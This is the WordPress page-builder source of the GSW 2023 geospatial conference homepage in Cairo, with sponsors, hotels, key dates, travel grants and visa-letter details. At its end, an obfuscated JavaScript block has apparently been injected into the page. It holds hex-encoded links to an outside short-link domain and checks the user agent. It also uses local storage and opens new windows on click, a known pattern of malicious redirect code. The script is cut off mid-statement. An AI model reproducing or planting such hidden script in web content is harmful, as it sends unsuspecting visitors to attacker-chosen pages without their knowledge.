rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320636985{margin-top: -20px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 